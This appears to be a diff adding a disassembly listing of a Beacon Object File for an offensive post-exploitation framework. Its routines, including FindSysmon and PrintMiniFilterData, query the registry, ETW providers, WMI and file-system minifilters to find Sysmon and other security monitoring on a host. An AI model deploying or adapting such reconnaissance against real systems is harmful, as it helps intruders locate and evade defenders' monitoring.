+  00000000000003BC: C6 84 24 89 00 00  mov         byte ptr [rsp+89h],0
+                    00 00
+  00000000000003C4: C6 84 24 8A 00 00  mov         byte ptr [rsp+8Ah],0
+                    00 00
+  00000000000003CC: C6 84 24 8B 00 00  mov         byte ptr [rsp+8Bh],0
+                    00 00
+  00000000000003D4: C6 84 24 8C 00 00  mov         byte ptr [rsp+8Ch],0
+                    00 00
+  00000000000003DC: C6 84 24 8D 00 00  mov         byte ptr [rsp+8Dh],0
+                    00 00
+  00000000000003E4: C6 84 24 8E 00 00  mov         byte ptr [rsp+8Eh],0
+                    00 00
+  00000000000003EC: C6 84 24 8F 00 00  mov         byte ptr [rsp+8Fh],46h
+                    00 46
+  00000000000003F4: C7 84 24 90 00 00  mov         dword ptr [rsp+90h],3837533h
+                    00 33 75 83 03
+  00000000000003FF: B8 8B 09 00 00     mov         eax,98Bh
+  0000000000000404: 66 89 84 24 94 00  mov         word ptr [rsp+94h],ax
+                    00 00
+  000000000000040C: B8 D8 11 00 00     mov         eax,11D8h
+  0000000000000411: 66 89 84 24 96 00  mov         word ptr [rsp+96h],ax
+                    00 00
+  0000000000000419: C6 84 24 98 00 00  mov         byte ptr [rsp+98h],94h
+                    00 94
+  0000000000000421: C6 84 24 99 00 00  mov         byte ptr [rsp+99h],14h
+                    00 14
+  0000000000000429: C6 84 24 9A 00 00  mov         byte ptr [rsp+9Ah],50h
+                    00 50
+  0000000000000431: C6 84 24 9B 00 00  mov         byte ptr [rsp+9Bh],50h
+                    00 50
+  0000000000000439: C6 84 24 9C 00 00  mov         byte ptr [rsp+9Ch],54h
+                    00 54
+  0000000000000441: C6 84 24 9D 00 00  mov         byte ptr [rsp+9Dh],50h
+                    00 50
+  0000000000000449: C6 84 24 9E 00 00  mov         byte ptr [rsp+9Eh],30h
+                    00 30
+  0000000000000451: C6 84 24 9F 00 00  mov         byte ptr [rsp+9Fh],30h
+                    00 30
+  0000000000000459: C7 44 24 4C 00 00  mov         dword ptr [rsp+4Ch],0
+                    00 00
+  0000000000000461: 33 D2              xor         edx,edx
+  0000000000000463: 33 C9              xor         ecx,ecx
+  0000000000000465: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CoInitializeEx]
+  000000000000046B: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000046F: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000474: 7D 07              jge         000000000000047D
+  0000000000000476: 33 C0              xor         eax,eax
+  0000000000000478: E9 55 02 00 00     jmp         00000000000006D2
+  000000000000047D: 48 8D 44 24 40     lea         rax,[rsp+40h]
+  0000000000000482: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000487: 4C 8D 4C 24 60     lea         r9,[rsp+60h]
+  000000000000048C: 41 B8 01 00 00 00  mov         r8d,1
+  0000000000000492: 33 D2              xor         edx,edx
+  0000000000000494: 48 8D 4C 24 70     lea         rcx,[rsp+70h]
+  0000000000000499: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CoCreateInstance]
+  000000000000049F: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  00000000000004A3: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  00000000000004A8: 7D 17              jge         00000000000004C1
+  00000000000004AA: 44 8B 44 24 30     mov         r8d,dword ptr [rsp+30h]
+  00000000000004AF: 48 8D 15 00 00 00  lea         rdx,[$SG105178]
+                    00
+  00000000000004B6: B9 0D 00 00 00     mov         ecx,0Dh
+  00000000000004BB: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  00000000000004C1: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  00000000000004C6: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000004C9: 45 33 C0           xor         r8d,r8d
+  00000000000004CC: 48 8B 94 24 F0 00  mov         rdx,qword ptr [rsp+0F0h]
+                    00 00
+  00000000000004D4: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000004D9: FF 90 A8 00 00 00  call        qword ptr [rax+0A8h]
+  00000000000004DF: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  00000000000004E3: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  00000000000004E8: 7D 17              jge         0000000000000501
+  00000000000004EA: 44 8B 44 24 30     mov         r8d,dword ptr [rsp+30h]
+  00000000000004EF: 48 8D 15 00 00 00  lea         rdx,[$SG105180]
+                    00
+  00000000000004F6: B9 0D 00 00 00     mov         ecx,0Dh
+  00000000000004FB: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000501: 48 C7 44 24 38 00  mov         qword ptr [rsp+38h],0
+                    00 00 00
+  000000000000050A: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  000000000000050F: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000512: 48 8D 54 24 38     lea         rdx,[rsp+38h]
+  0000000000000517: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  000000000000051C: FF 90 C8 00 00 00  call        qword ptr [rax+0C8h]
+  0000000000000522: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  0000000000000526: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  000000000000052B: 0F 85 77 01 00 00  jne         00000000000006A8
+  0000000000000531: C7 44 24 48 00 00  mov         dword ptr [rsp+48h],0
+                    00 00
+  0000000000000539: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  000000000000053E: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000541: 48 8D 54 24 48     lea         rdx,[rsp+48h]
+  0000000000000546: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  000000000000054B: FF 50 38           call        qword ptr [rax+38h]
+  000000000000054E: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  0000000000000552: 83 7C 24 48 00     cmp         dword ptr [rsp+48h],0
+  0000000000000557: 0F 8E 4B 01 00 00  jle         00000000000006A8
+  000000000000055D: 48 C7 44 24 50 00  mov         qword ptr [rsp+50h],0
+                    00 00 00
+  0000000000000566: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  000000000000056B: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000056E: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  0000000000000573: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  0000000000000578: FF 50 48           call        qword ptr [rax+48h]
+  000000000000057B: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000057F: 48 C7 84 24 A0 00  mov         qword ptr [rsp+0A0h],0
+                    00 00 00 00 00 00
+  000000000000058B: 48 8B 44 24 50     mov         rax,qword ptr [rsp+50h]
+  0000000000000590: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000593: 4C 8D 84 24 A0 00  lea         r8,[rsp+0A0h]
+                    00 00
+  000000000000059B: 48 8D 94 24 80 00  lea         rdx,[rsp+80h]
+                    00 00
+  00000000000005A3: 48 8B 4C 24 50     mov         rcx,qword ptr [rsp+50h]
+  00000000000005A8: FF 10              call        qword ptr [rax]
+  00000000000005AA: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  00000000000005AE: 48 8B 44 24 50     mov         rax,qword ptr [rsp+50h]
+  00000000000005B3: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000005B6: 48 8B 4C 24 50     mov         rcx,qword ptr [rsp+50h]
+  00000000000005BB: FF 50 10           call        qword ptr [rax+10h]
+  00000000000005BE: 48 8D 8C 24 C0 00  lea         rcx,[rsp+0C0h]
+                    00 00
+  00000000000005C6: FF 15 00 00 00 00  call        qword ptr [__imp_OLEAUT32$VariantInit]
+  00000000000005CC: 48 8D 8C 24 A8 00  lea         rcx,[rsp+0A8h]
+                    00 00
+  00000000000005D4: FF 15 00 00 00 00  call        qword ptr [__imp_OLEAUT32$VariantInit]
+  00000000000005DA: 48 C7 44 24 58 00  mov         qword ptr [rsp+58h],0
+                    00 00 00
+  00000000000005E3: 48 8B 84 24 A0 00  mov         rax,qword ptr [rsp+0A0h]
+                    00 00
+  00000000000005EB: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000005EE: 45 33 C9           xor         r9d,r9d
+  00000000000005F1: 4C 8D 84 24 C0 00  lea         r8,[rsp+0C0h]
+                    00 00
+  00000000000005F9: BA 01 00 00 00     mov         edx,1
+  00000000000005FE: 48 8B 8C 24 A0 00  mov         rcx,qword ptr [rsp+0A0h]
+                    00 00
+  0000000000000606: FF 50 18           call        qword ptr [rax+18h]
+  0000000000000609: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000060D: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000612: 0F 85 90 00 00 00  jne         00000000000006A8
+  0000000000000618: 48 8B 84 24 C8 00  mov         rax,qword ptr [rsp+0C8h]
+                    00 00
+  0000000000000620: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000623: 4C 8D 44 24 58     lea         r8,[rsp+58h]
+  0000000000000628: 48 8D 94 24 90 00  lea         rdx,[rsp+90h]
+                    00 00
+  0000000000000630: 48 8B 8C 24 C8 00  mov         rcx,qword ptr [rsp+0C8h]
+                    00 00
+  0000000000000638: FF 10              call        qword ptr [rax]
+  000000000000063A: 48 8B 44 24 58     mov         rax,qword ptr [rsp+58h]
+  000000000000063F: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000642: 48 8D 94 24 A8 00  lea         rdx,[rsp+0A8h]
+                    00 00
+  000000000000064A: 48 8B 4C 24 58     mov         rcx,qword ptr [rsp+58h]
+  000000000000064F: FF 50 68           call        qword ptr [rax+68h]
+  0000000000000652: 83 BC 24 B0 00 00  cmp         dword ptr [rsp+0B0h],0
+                    00 00
+  000000000000065A: 74 1B              je          0000000000000677
+  000000000000065C: 8B 94 24 B0 00 00  mov         edx,dword ptr [rsp+0B0h]
+                    00
+  0000000000000663: 48 8D 0D 00 00 00  lea         rcx,[$SG105184]
+                    00
+  000000000000066A: E8 00 00 00 00     call        BeaconPrintToStreamW
+  000000000000066F: C7 44 24 4C 01 00  mov         dword ptr [rsp+4Ch],1
+                    00 00
+  0000000000000677: 48 8D 8C 24 A8 00  lea         rcx,[rsp+0A8h]
+                    00 00
+  000000000000067F: FF 15 00 00 00 00  call        qword ptr [__imp_OLEAUT32$VariantClear]
+  0000000000000685: 48 8B 44 24 58     mov         rax,qword ptr [rsp+58h]
+  000000000000068A: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000068D: 48 8B 4C 24 58     mov         rcx,qword ptr [rsp+58h]
+  0000000000000692: FF 50 10           call        qword ptr [rax+10h]
+  0000000000000695: 48 8D 8C 24 C0 00  lea         rcx,[rsp+0C0h]
+                    00 00
+  000000000000069D: FF 15 00 00 00 00  call        qword ptr [__imp_OLEAUT32$VariantClear]
+  00000000000006A3: E9 3B FF FF FF     jmp         00000000000005E3
+  00000000000006A8: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  00000000000006AD: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000006B0: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  00000000000006B5: FF 50 10           call        qword ptr [rax+10h]
+  00000000000006B8: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  00000000000006BD: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000006C0: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000006C5: FF 50 10           call        qword ptr [rax+10h]
+  00000000000006C8: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CoUninitialize]
+  00000000000006CE: 8B 44 24 4C        mov         eax,dword ptr [rsp+4Ch]
+  00000000000006D2: 48 81 C4 E8 00 00  add         rsp,0E8h
+                    00
+  00000000000006D9: C3                 ret
+  00000000000006DA: CC                 int         3
+  00000000000006DB: CC                 int         3
+  00000000000006DC: CC                 int         3
+  00000000000006DD: CC                 int         3
+  00000000000006DE: CC                 int         3
+  00000000000006DF: CC                 int         3
+FindSysmon:
+  00000000000006E0: 48 81 EC E8 02 00  sub         rsp,2E8h
+                    00
+  00000000000006E7: C7 44 24 4C 00 00  mov         dword ptr [rsp+4Ch],0
+                    00 00
+  00000000000006EF: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  00000000000006F8: 48 C7 44 24 70 00  mov         qword ptr [rsp+70h],0
+                    00 00 00
+  0000000000000701: C7 44 24 50 00 00  mov         dword ptr [rsp+50h],0
+                    00 00
+  0000000000000709: C7 44 24 64 00 00  mov         dword ptr [rsp+64h],0
+                    00 00
+  0000000000000711: C7 44 24 60 E8 FD  mov         dword ptr [rsp+60h],0FDE8h
+                    00 00
+  0000000000000719: 48 C7 44 24 58 00  mov         qword ptr [rsp+58h],0
+                    00 00 00
+  0000000000000722: C7 44 24 68 00 00  mov         dword ptr [rsp+68h],0
+                    00 00
+  000000000000072A: 48 8D 44 24 78     lea         rax,[rsp+78h]
+  000000000000072F: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000734: 41 B9 19 00 02 00  mov         r9d,20019h
+  000000000000073A: 45 33 C0           xor         r8d,r8d
+  000000000000073D: 48 8D 15 00 00 00  lea         rdx,[$SG105226]
+                    00
+  0000000000000744: 48 C7 C1 02 00 00  mov         rcx,0FFFFFFFF80000002h
+                    80
+  000000000000074B: FF 15 00 00 00 00  call        qword ptr [__imp_ADVAPI32$RegOpenKeyExA]
+  0000000000000751: 85 C0              test        eax,eax
+  0000000000000753: 0F 85 CD 00 00 00  jne         0000000000000826
+  0000000000000759: 8B 44 24 60        mov         eax,dword ptr [rsp+60h]
+  000000000000075D: 48 89 84 24 88 00  mov         qword ptr [rsp+88h],rax
+                    00 00
+  0000000000000765: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  000000000000076B: 48 8B 8C 24 88 00  mov         rcx,qword ptr [rsp+88h]
+                    00 00
+  0000000000000773: 4C 8B C1           mov         r8,rcx
+  0000000000000776: BA 08 00 00 00     mov         edx,8
+  000000000000077B: 48 8B C8           mov         rcx,rax
+  000000000000077E: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapAlloc]
+  0000000000000784: 48 89 44 24 58     mov         qword ptr [rsp+58h],rax
+  0000000000000789: 48 83 7C 24 58 00  cmp         qword ptr [rsp+58h],0
+  000000000000078F: 75 07              jne         0000000000000798
+  0000000000000791: 33 C0              xor         eax,eax
+  0000000000000793: E9 7A 02 00 00     jmp         0000000000000A12
+  0000000000000798: 48 8D 44 24 60     lea         rax,[rsp+60h]
+  000000000000079D: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  00000000000007A2: 48 8B 44 24 58     mov         rax,qword ptr [rsp+58h]
+  00000000000007A7: 48 89 44 24 28     mov         qword ptr [rsp+28h],rax
+  00000000000007AC: 48 8D 84 24 80 00  lea         rax,[rsp+80h]
+                    00 00
+  00000000000007B4: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  00000000000007B9: 41 B9 FF FF 00 00  mov         r9d,0FFFFh
+  00000000000007BF: 4C 8D 05 00 00 00  lea         r8,[$SG105229]
+                    00
+  00000000000007C6: 33 D2              xor         edx,edx
+  00000000000007C8: 48 8B 4C 24 78     mov         rcx,qword ptr [rsp+78h]
+  00000000000007CD: FF 15 00 00 00 00  call        qword ptr [__imp_ADVAPI32$RegGetValueA]
+  00000000000007D3: 85 C0              test        eax,eax
+  00000000000007D5: 74 07              je          00000000000007DE
+  00000000000007D7: 33 C0              xor         eax,eax
+  00000000000007D9: E9 34 02 00 00     jmp         0000000000000A12
+  00000000000007DE: 48 8B 4C 24 58     mov         rcx,qword ptr [rsp+58h]
+  00000000000007E3: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$strlen]
+  00000000000007E9: 48 85 C0           test        rax,rax
+  00000000000007EC: 74 2F              je          000000000000081D
+  00000000000007EE: C7 44 24 28 00 01  mov         dword ptr [rsp+28h],100h
+                    00 00
+  00000000000007F6: 48 8D 84 24 E0 00  lea         rax,[rsp+0E0h]
+                    00 00
+  00000000000007FE: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000803: 41 B9 FF FF FF FF  mov         r9d,0FFFFFFFFh
+  0000000000000809: 4C 8B 44 24 58     mov         r8,qword ptr [rsp+58h]
+  000000000000080E: 33 D2              xor         edx,edx
+  0000000000000810: B9 E9 FD 00 00     mov         ecx,0FDE9h
+  0000000000000815: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$MultiByteToWideChar]
+  000000000000081B: EB 07              jmp         0000000000000824
+  000000000000081D: 33 C0              xor         eax,eax
+  000000000000081F: E9 EE 01 00 00     jmp         0000000000000A12
+  0000000000000824: EB 07              jmp         000000000000082D
+  0000000000000826: 33 C0              xor         eax,eax
+  0000000000000828: E9 E5 01 00 00     jmp         0000000000000A12
+  000000000000082D: 48 83 7C 24 58 00  cmp         qword ptr [rsp+58h],0
+  0000000000000833: 74 16              je          000000000000084B
+  0000000000000835: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  000000000000083B: 4C 8B 44 24 58     mov         r8,qword ptr [rsp+58h]
+  0000000000000840: 33 D2              xor         edx,edx
+  0000000000000842: 48 8B C8           mov         rcx,rax
+  0000000000000845: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapFree]
+  000000000000084B: 48 8B 4C 24 78     mov         rcx,qword ptr [rsp+78h]
+  0000000000000850: FF 15 00 00 00 00  call        qword ptr [__imp_ADVAPI32$RegCloseKey]
+  0000000000000856: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  000000000000085B: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000860: FF 15 00 00 00 00  call        qword ptr [__imp_TDH$TdhEnumerateProviders]
+  0000000000000866: 89 44 24 4C        mov         dword ptr [rsp+4Ch],eax
+  000000000000086A: 83 7C 24 4C 7A     cmp         dword ptr [rsp+4Ch],7Ah
+  000000000000086F: 75 4E              jne         00000000000008BF
+  0000000000000871: 8B 44 24 50        mov         eax,dword ptr [rsp+50h]
+  0000000000000875: 8B D0              mov         edx,eax
+  0000000000000877: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  000000000000087C: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$realloc]
+  0000000000000882: 48 89 44 24 70     mov         qword ptr [rsp+70h],rax
+  0000000000000887: 48 83 7C 24 70 00  cmp         qword ptr [rsp+70h],0
+  000000000000088D: 75 07              jne         0000000000000896
+  000000000000088F: 33 C0              xor         eax,eax
+  0000000000000891: E9 7C 01 00 00     jmp         0000000000000A12
+  0000000000000896: 48 8B 44 24 70     mov         rax,qword ptr [rsp+70h]
+  000000000000089B: 48 89 44 24 40     mov         qword ptr [rsp+40h],rax
+  00000000000008A0: 48 C7 44 24 70 00  mov         qword ptr [rsp+70h],0
+                    00 00 00
+  00000000000008A9: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  00000000000008AE: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000008B3: FF 15 00 00 00 00  call        qword ptr [__imp_TDH$TdhEnumerateProviders]
+  00000000000008B9: 89 44 24 4C        mov         dword ptr [rsp+4Ch],eax
+  00000000000008BD: EB AB              jmp         000000000000086A
+  00000000000008BF: 83 7C 24 4C 00     cmp         dword ptr [rsp+4Ch],0
+  00000000000008C4: 74 17              je          00000000000008DD
+  00000000000008C6: 48 8D 15 00 00 00  lea         rdx,[$SG105236]
+                    00
+  00000000000008CD: B9 0D 00 00 00     mov         ecx,0Dh
+  00000000000008D2: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  00000000000008D8: E9 17 01 00 00     jmp         00000000000009F4
+  00000000000008DD: C7 44 24 48 00 00  mov         dword ptr [rsp+48h],0
+                    00 00
+  00000000000008E5: EB 0A              jmp         00000000000008F1
+  00000000000008E7: 8B 44 24 48        mov         eax,dword ptr [rsp+48h]
+  00000000000008EB: FF C0              inc         eax
+  00000000000008ED: 89 44 24 48        mov         dword ptr [rsp+48h],eax
+  00000000000008F1: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  00000000000008F6: 8B 00              mov         eax,dword ptr [rax]
+  00000000000008F8: 39 44 24 48        cmp         dword ptr [rsp+48h],eax
+  00000000000008FC: 0F 83 F2 00 00 00  jae         00000000000009F4
+  0000000000000902: 8B 44 24 48        mov         eax,dword ptr [rsp+48h]
+  0000000000000906: 48 6B C0 18        imul        rax,rax,18h
+  000000000000090A: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  000000000000090F: 48 8D 44 01 08     lea         rax,[rcx+rax+8]
+  0000000000000914: 41 B8 27 00 00 00  mov         r8d,27h
+  000000000000091A: 48 8D 94 24 90 00  lea         rdx,[rsp+90h]
+                    00 00
+  0000000000000922: 48 8B C8           mov         rcx,rax
+  0000000000000925: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$StringFromGUID2]
+  000000000000092B: 89 44 24 64        mov         dword ptr [rsp+64h],eax
+  000000000000092F: 83 7C 24 64 00     cmp         dword ptr [rsp+64h],0
+  0000000000000934: 7D 07              jge         000000000000093D
+  0000000000000936: 33 C0              xor         eax,eax
+  0000000000000938: E9 D5 00 00 00     jmp         0000000000000A12
+  000000000000093D: 48 8D 94 24 E0 00  lea         rdx,[rsp+0E0h]
+                    00 00
+  0000000000000945: 48 8D 8C 24 90 00  lea         rcx,[rsp+90h]
+                    00 00
+  000000000000094D: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$_wcsicmp]
+  0000000000000953: 85 C0              test        eax,eax
+  0000000000000955: 0F 85 94 00 00 00  jne         00000000000009EF
+  000000000000095B: 48 8D 0D 00 00 00  lea         rcx,[$SG105239]
+                    00
+  0000000000000962: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000967: 48 8D 8C 24 E0 00  lea         rcx,[rsp+0E0h]
+                    00 00
+  000000000000096F: E8 00 00 00 00     call        PrintSysmonPID
+  0000000000000974: 89 44 24 68        mov         dword ptr [rsp+68h],eax
+  0000000000000978: 83 7C 24 68 00     cmp         dword ptr [rsp+68h],0
+  000000000000097D: 75 0E              jne         000000000000098D
+  000000000000097F: 48 8D 0D 00 00 00  lea         rcx,[$SG105242]
+                    00
+  0000000000000986: E8 00 00 00 00     call        BeaconPrintToStreamW
+  000000000000098B: EB 0C              jmp         0000000000000999
+  000000000000098D: 48 8D 0D 00 00 00  lea         rcx,[$SG105243]
+                    00
+  0000000000000994: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000999: 8B 44 24 48        mov         eax,dword ptr [rsp+48h]
+  000000000000099D: 48 6B C0 18        imul        rax,rax,18h
+  00000000000009A1: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000009A6: 8B 44 01 1C        mov         eax,dword ptr [rcx+rax+1Ch]
+  00000000000009AA: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000009AF: 48 03 C8           add         rcx,rax
+  00000000000009B2: 48 8B C1           mov         rax,rcx
+  00000000000009B5: 4C 8D 84 24 90 00  lea         r8,[rsp+90h]
+                    00 00
+  00000000000009BD: 48 8B D0           mov         rdx,rax
+  00000000000009C0: 48 8D 0D 00 00 00  lea         rcx,[$SG105244]
+                    00
+  00000000000009C7: E8 00 00 00 00     call        BeaconPrintToStreamW
+  00000000000009CC: 48 83 7C 24 40 00  cmp         qword ptr [rsp+40h],0
+  00000000000009D2: 74 14              je          00000000000009E8
+  00000000000009D4: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000009D9: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  00000000000009DF: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  00000000000009E8: B8 01 00 00 00     mov         eax,1
+  00000000000009ED: EB 23              jmp         0000000000000A12
+  00000000000009EF: E9 F3 FE FF FF     jmp         00000000000008E7
+  00000000000009F4: 48 83 7C 24 40 00  cmp         qword ptr [rsp+40h],0
+  00000000000009FA: 74 14              je          0000000000000A10
+  00000000000009FC: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000A01: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  0000000000000A07: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  0000000000000A10: 33 C0              xor         eax,eax
+  0000000000000A12: 48 81 C4 E8 02 00  add         rsp,2E8h
+                    00
+  0000000000000A19: C3                 ret
+  0000000000000A1A: CC                 int         3
+  0000000000000A1B: CC                 int         3
+  0000000000000A1C: CC                 int         3
+  0000000000000A1D: CC                 int         3
+  0000000000000A1E: CC                 int         3
+  0000000000000A1F: CC                 int         3
+PrintMiniFilterData:
+  0000000000000A20: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000A25: 48 83 EC 58        sub         rsp,58h
+  0000000000000A29: 48 C7 44 24 28 00  mov         qword ptr [rsp+28h],0
+                    00 00 00
+  0000000000000A32: 48 8B 44 24 60     mov         rax,qword ptr [rsp+60h]
+  0000000000000A37: 48 89 44 24 28     mov         qword ptr [rsp+28h],rax
+  0000000000000A3C: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000A41: 0F B7 40 14        movzx       eax,word ptr [rax+14h]
+  0000000000000A45: 89 44 24 20        mov         dword ptr [rsp+20h],eax
+  0000000000000A49: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000A4E: 0F B7 40 16        movzx       eax,word ptr [rax+16h]
+  0000000000000A52: 48 8B 4C 24 60     mov         rcx,qword ptr [rsp+60h]
+  0000000000000A57: 48 03 C8           add         rcx,rax
+  0000000000000A5A: 48 8B C1           mov         rax,rcx
+  0000000000000A5D: 48 89 44 24 40     mov         qword ptr [rsp+40h],rax
+  0000000000000A62: 8B 44 24 20        mov         eax,dword ptr [rsp+20h]
+  0000000000000A66: 83 C0 02           add         eax,2
+  0000000000000A69: 48 98              cdqe
+  0000000000000A6B: 48 8B C8           mov         rcx,rax
+  0000000000000A6E: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$malloc]
+  0000000000000A74: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  0000000000000A79: 8B 44 24 20        mov         eax,dword ptr [rsp+20h]
+  0000000000000A7D: 83 C0 02           add         eax,2
+  0000000000000A80: 48 98              cdqe
+  0000000000000A82: 4C 8B C0           mov         r8,rax
+  0000000000000A85: 33 D2              xor         edx,edx
+  0000000000000A87: 48 8B 4C 24 30     mov         rcx,qword ptr [rsp+30h]
+  0000000000000A8C: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memset]
+  0000000000000A92: 48 63 44 24 20     movsxd      rax,dword ptr [rsp+20h]
+  0000000000000A97: 4C 8B C0           mov         r8,rax
+  0000000000000A9A: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000A9F: 48 8B 4C 24 30     mov         rcx,qword ptr [rsp+30h]
+  0000000000000AA4: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memcpy]
+  0000000000000AAA: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000AAF: 0F B7 40 18        movzx       eax,word ptr [rax+18h]
+  0000000000000AB3: 89 44 24 24        mov         dword ptr [rsp+24h],eax
+  0000000000000AB7: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000ABC: 0F B7 40 1A        movzx       eax,word ptr [rax+1Ah]
+  0000000000000AC0: 48 8B 4C 24 60     mov         rcx,qword ptr [rsp+60h]
+  0000000000000AC5: 48 03 C8           add         rcx,rax
+  0000000000000AC8: 48 8B C1           mov         rax,rcx
+  0000000000000ACB: 48 89 44 24 40     mov         qword ptr [rsp+40h],rax
+  0000000000000AD0: 8B 44 24 24        mov         eax,dword ptr [rsp+24h]
+  0000000000000AD4: 83 C0 02           add         eax,2
+  0000000000000AD7: 48 98              cdqe
+  0000000000000AD9: 48 8B C8           mov         rcx,rax
+  0000000000000ADC: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$malloc]
+  0000000000000AE2: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  0000000000000AE7: 8B 44 24 24        mov         eax,dword ptr [rsp+24h]
+  0000000000000AEB: 83 C0 02           add         eax,2
+  0000000000000AEE: 48 98              cdqe
+  0000000000000AF0: 4C 8B C0           mov         r8,rax
+  0000000000000AF3: 33 D2              xor         edx,edx
+  0000000000000AF5: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  0000000000000AFA: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memset]
+  0000000000000B00: 48 63 44 24 24     movsxd      rax,dword ptr [rsp+24h]
+  0000000000000B05: 4C 8B C0           mov         r8,rax
+  0000000000000B08: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000B0D: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  0000000000000B12: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memcpy]
+  0000000000000B18: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000B1D: 83 78 04 01        cmp         dword ptr [rax+4],1
+  0000000000000B21: 75 1F              jne         0000000000000B42
+  0000000000000B23: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000B28: 44 8B 48 10        mov         r9d,dword ptr [rax+10h]
